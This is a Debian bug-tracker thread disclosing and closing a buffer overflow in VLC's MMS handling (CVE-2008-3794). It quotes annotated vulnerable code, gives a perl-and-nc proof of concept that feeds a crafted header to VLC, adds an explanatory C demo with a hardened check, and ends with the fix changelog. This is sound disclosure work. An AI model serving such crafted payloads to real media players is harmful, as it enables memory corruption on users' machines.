Your message dated Wed, 27 Aug 2008 09:47:13 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#496265: fixed in vlc 0.8.6.i-2
has caused the Debian Bug report #496265,
regarding vlc: buffer overflow in mms handling
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)
--
496265: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496265
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: vlc
Version: 0.8.6.i-1
Severity: grave
Tags: security
Hi,
the following security issue was published for vlc
static int mms_ReceiveCommand( access_t *p_access )
{
    access_sys_t *p_sys = p_access->p_sys;

    for( ;; )
    {
        int i_used;
        int i_status;

        if( NetFillBuffer( p_access ) < 0 )
        {
            msg_Warn( p_access, "cannot fill buffer" );
            return VLC_EGENERIC;
        }
        if( p_sys->i_buffer_tcp > 0 )
        {
[1]         i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp,
                                         p_sys->i_buffer_tcp, &i_used );
[2]         if( i_used < MMS_BUFFER_SIZE )
            {
[3]             memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used,
                         MMS_BUFFER_SIZE - i_used ); //BUG! i_used overflow
(...)

[1] - function that sets i_used to negative value, see below
[2] - i_used is signed, so predicate is true
[3] - actual overflow, we have good control over what is written
static int mms_ParseCommand( access_t *p_access,
                             uint8_t *p_data,
                             int i_data,
                             int *pi_used )
(...)
    i_length = GetDWLE( p_data + 8 ) + 16;
(...)
    if( i_length > p_sys->i_cmd )
    {
        msg_Warn( p_access,
                  "truncated command (missing %d bytes)",
                  i_length - i_data );
        p_sys->i_command = 0;
        return -1;
    }
[1] else if( i_length < p_sys->i_cmd )
    {
        p_sys->i_cmd = i_length;
[2]     *pi_used = i_length;
    }
(...)

[1] - predicate is true
[2] - sets i_used from mms_ReceiveCommand
- Proof of concept -
on localhost:
perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot
nc -l -v -p 1755 < headshot
open this url in VLC:
mmst://127.0.0.1/
I can confirm this issue exists.
Please see http://www.orange-bat.com/adv/2008/adv.08.24.txt for the original
advisory.
I'll follow up on this bug report with a CVE id soon.
Kind regards
Nico
--
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
--- End Message ---
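Added example, not part of the original report, the advisory or the VLC sources: it carries the length field from the report's test input through the arithmetic quoted above, showing that the value is negative, passes the quoted guard, and yields an oversized memmove count, next to a consume step with both bounds checked. BUF_SIZE is an illustrative stand-in for MMS_BUFFER_SIZE, and consume() is a hypothetical hardened form, not upstream's 407-mms-overflow.diff.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64 /* illustrative stand-in for MMS_BUFFER_SIZE */

/* First 12 bytes of the test input quoted in the report; length field at offset 8. */
static const uint8_t REPORT_HEADER[12] = { 'a','a','a','a', 0xce,0xfa,0x0b,0xb0,
                                           0xef,0xff,0xef,0xff };

/* i_length = GetDWLE( p_data + 8 ) + 16, stored in a signed int as quoted above. */
static int parsed_length(const uint8_t *p)
{
    uint32_t v = (uint32_t)p[8] | (uint32_t)p[9] << 8 |
                 (uint32_t)p[10] << 16 | (uint32_t)p[11] << 24;
    return (int)(int32_t)(v + 16u); /* goes negative for v >= 0x7ffffff0 */
}

/* The guard as quoted: a signed upper bound with no lower bound. */
static int check_as_reported(int i_used) { return i_used < BUF_SIZE; }

/* Length the quoted memmove would be handed once converted to size_t. */
static size_t move_count(int i_used) { return (size_t)((long long)BUF_SIZE - i_used); }

/* Hardened consume step (hypothetical): both bounds, and only buffered bytes move. */
static int consume(uint8_t *buf, int i_buffered, int i_used)
{
    if (i_buffered < 0 || i_buffered > BUF_SIZE) return -1;
    if (i_used < 0 || i_used > i_buffered) return -1;
    memmove(buf, buf + i_used, (size_t)(i_buffered - i_used));
    return i_buffered - i_used; /* new fill level */
}

int main(void)
{
    uint8_t buf[BUF_SIZE] = "abcdefgh"; /* constructed sample data */
    int bad = parsed_length(REPORT_HEADER);
    printf("i_used=%d passes quoted guard=%d memmove count=%zu\n",
           bad, check_as_reported(bad), move_count(bad));
    printf("hardened: bad -> %d, good -> %d\n",
           consume(buf, 8, bad), consume(buf, 8, 3));
    return 0;
}
```

The source pointer in the quoted memmove is also offset by the negative i_used, so both the read origin and the byte count are outside the buffer; rejecting i_used < 0 closes both.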
--- Begin Message ---
Source: vlc
Source-Version: 0.8.6.i-2
We believe that the bug you reported is fixed in the latest version of
vlc, which is due to be installed in the Debian FTP archive:
libvlc0-dev_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/libvlc0-dev_0.8.6.i-2_amd64.deb
libvlc0_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/libvlc0_0.8.6.i-2_amd64.deb
mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
vlc-nox_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-nox_0.8.6.i-2_amd64.deb
vlc-plugin-arts_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-plugin-arts_0.8.6.i-2_amd64.deb
vlc-plugin-esd_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-plugin-esd_0.8.6.i-2_amd64.deb
vlc-plugin-ggi_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.i-2_amd64.deb
vlc-plugin-jack_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-plugin-jack_0.8.6.i-2_amd64.deb
vlc-plugin-sdl_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.i-2_amd64.deb
vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
vlc_0.8.6.i-2.diff.gz
to pool/main/v/vlc/vlc_0.8.6.i-2.diff.gz
vlc_0.8.6.i-2.dsc
to pool/main/v/vlc/vlc_0.8.6.i-2.dsc
vlc_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc_0.8.6.i-2_amd64.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Sam Hocevar (Debian packages) <[EMAIL PROTECTED]> (supplier of updated vlc
package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Tue, 26 Aug 2008 23:25:13 +0000
Source: vlc
Binary: vlc vlc-nox libvlc0 libvlc0-dev vlc-plugin-esd vlc-plugin-sdl
vlc-plugin-ggi vlc-plugin-glide vlc-plugin-arts mozilla-plugin-vlc
vlc-plugin-svgalib vlc-plugin-jack
Architecture: source amd64
Version: 0.8.6.i-2
Distribution: experimental
Urgency: high
Maintainer: Debian multimedia packages maintainers <[EMAIL PROTECTED]>
Changed-By: Sam Hocevar (Debian packages) <[EMAIL PROTECTED]>
Description:
libvlc0 - multimedia player and streamer library
libvlc0-dev - development files for VLC
mozilla-plugin-vlc - multimedia plugin for web browsers based on VLC
vlc - multimedia player and streamer
vlc-nox - multimedia player and streamer (without X support)
vlc-plugin-arts - aRts audio output plugin for VLC
vlc-plugin-esd - Esound audio output plugin for VLC
vlc-plugin-ggi - GGI video output plugin for VLC
vlc-plugin-glide - Glide video output plugin for VLC
vlc-plugin-jack - Jack audio plugins for VLC
vlc-plugin-sdl - SDL video and audio output plugin for VLC
vlc-plugin-svgalib - SVGAlib video output plugin for VLC
Closes: 496265
Changes:
vlc (0.8.6.i-2) experimental; urgency=high
.
[ Loic Minier ]
* Fix changelog entries for 0.8.6.h-2 and 0.8.6.h-3.
* Bump up Standards-Version to 3.8.0.
.
[ Christophe Mutricy ]
* Security: Fix integer overflow in mms module (CVE-2008-3794)
(Closes: #496265)(407-mms-overflow.diff taken from upstream)
.
[ Sam Hocevar ]
* debian/patches/300_manpage_syntax.diff: fix vlc-config.1 syntax.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEUEARECAAYFAki0m18ACgkQfPP1rylJn2GCNwCXZvEAHX/+GcnmHdxFhm0Vh103
/wCglAPJpSK6Ce84z8zJKFX3onttt4g=
=WsNO
-----END PGP SIGNATURE-----
--- End Message ---